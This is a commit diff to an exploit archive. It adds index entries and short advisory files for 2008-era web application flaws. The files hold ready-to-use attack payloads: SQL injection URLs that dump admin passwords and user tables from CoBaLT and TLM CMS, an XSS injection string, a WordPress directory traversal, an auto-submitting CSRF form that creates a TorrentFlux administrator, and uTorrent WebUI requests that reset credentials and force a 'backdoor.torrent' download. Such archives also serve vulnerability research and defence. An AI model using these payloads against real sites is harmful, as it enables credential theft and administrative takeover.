Updated 02_16_2014

files.csv

@@ -28439,3 +28439,17 @@ id,file,description,date,author,platform,type,port
 31655,platforms/php/webapps/31655.txt,"Istant-Replay 'read.php' Remote File Include Vulnerability",2008-04-15,THuGM4N,php,webapps,0
 31656,platforms/windows/dos/31656.txt,"ICQ 6 'Personal Status Manager' Remote Buffer Overflow Vulnerability",2008-04-16,"Leon Juranic",windows,dos,0
 31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 'bs_auth.php' Cross Site Scripting Vulnerability",2008-04-16,ZoRLu,php,webapps,0
+31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 'rep.php' Cross-Site Scripting Vulnerability",2008-04-17,ZoRLu,php,webapps,0
+31659,platforms/php/webapps/31659.txt,"Php-Stats 0.1.9.1 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0
+31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 add_groupe.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
+31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 contacts.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
+31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 groupes.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
+31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 importer.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
+31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 login.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
+31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 search.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
+31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 'adminler.asp' SQL Injection Vulnerability",2008-04-17,U238,asp,webapps,0
+31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 Multiple SQL Injection Vulnerabilities",2008-04-18,ZoRLu,php,webapps,0
+31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 'wiki' Parameter Cross-Site Scripting Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
+31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
+31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0
+31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,php,webapps,0

platforms/asp/webapps/31666.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28831/info
+
+CoBaLT is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CoBaLT 2.0 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin
+http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4
+

platforms/php/webapps/31658.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28823/info
+
+MyBoard is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MyBoard 1.0.12 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/MyBoard/rep.php?id=[XSS] 

platforms/php/webapps/31659.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/28824/info
+
+Php-Stats is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+
+Php-Stats 0.1.9.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/stats/admin.php?action=systems&mode=0&sel_anno=2008&sel_mese=[XSS]
+http://www.example.com/stats/admin.php?action=systems&mode=0&sel_anno=[XSS]
+
+

platforms/php/webapps/31660.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28825/info
+
+EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/EScontacts_path/EsContacts/add_groupe.php?msg=[XSS]

platforms/php/webapps/31661.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28825/info
+ 
+EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/EScontacts_path/EsContacts/contacts.php?msg=[XSS]

platforms/php/webapps/31662.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28825/info
+  
+EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+  
+http://www.example.com/EScontacts_path/EsContacts/groupes.php?msg=[XSS]

platforms/php/webapps/31663.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28825/info
+   
+EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+   
+http://www.example.com/EScontacts_path/EsContacts/importer.php?msg=[XSS]

platforms/php/webapps/31664.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28825/info
+    
+EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/EScontacts_path/EsContacts/login.php?msg=[XSS]

platforms/php/webapps/31665.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28825/info
+     
+EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+     
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/EScontacts_path/EsContacts/search.php?msg=[XSS] 

platforms/php/webapps/31668.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28837/info
+
+TLM CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+TLM CMS 3.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/timcms31/a-b-membres.php?action=Perso&nom=1'/**/union/**/select/**/0,1,2,3,4,5,6,US_uid,8,9,US_mail,11,12,13,14,15,US_pseudo,US_pwd,18,19,20,21,22,23/**/from/**/pphp_user/*
+http://www.example.com/tmcms31/goodies.php?act=lire&idnews=-1/**/union/**/select/**/0,1,2,US_pwd,US_pseudo,5,6,7,US_mail,9,10/**/from/**/pphp_user/*
+

platforms/php/webapps/31669.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28842/info
+
+Wikepage Opus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Wikepage Opus 13 2007.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wikepage_2007_2/index.php?wiki=test%22%20onclick=%22alert(1)%22%20%20bla=%22

platforms/php/webapps/31670.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28845/info
+
+WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting the issue may allow an attacker to access sensitive information that could aid in further attacks.
+
+WordPress 2.3.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/?cat=1.php/../searchform?
+

platforms/php/webapps/31671.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28846/info
+
+TorrentFlux is prone to a cross-site request-forgery vulnerability and a remote PHP code-execution vulnerability.
+
+Exploiting these issues may allow a remote attacker to create administrative accounts in the application or to execute arbitrary PHP script code. This may facilitate the remote compromise of affected computers.
+
+TorrentFlux 2.3 is vulnerable; other versions may also be affected.
+
+<html> Add an admistrative account: <form id=?create_admin? method=?post? action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?> <input type=hidden name=?newUser? value=?sadmin?> <input type=hidden name=?pass1&#8243; value=?password?> <input type=hidden name=?pass2&#8243; value=?password?> <input type=hidden name=?userType? value=1> <input type=submit value=?create admin?> </form> </html> <script> document.getElementById(?create_admin?).submit(); </script> 

platforms/php/webapps/31672.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/28847/info
+
+uTorrent WebUI is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to execute arbitrary actions in the context of the affected application.
+
+uTorrent WebUI 0.310 beta 2 is vulnerable; other versions may also be affected.
+
+To force a file download:
+http://www.example.com:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent
+
+To change administrative credentials and settings:
+http://www.example.com:8080/gui/?action=setsetting&s=webui.username&v=badmin
+http://www.example.com:8080/gui/?action=setsetting&s=webui.password&v=badmin
+http://www.example.com:8080/gui/?action=setsetting&s=webui.port&v=4096 http://www.example.com:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
+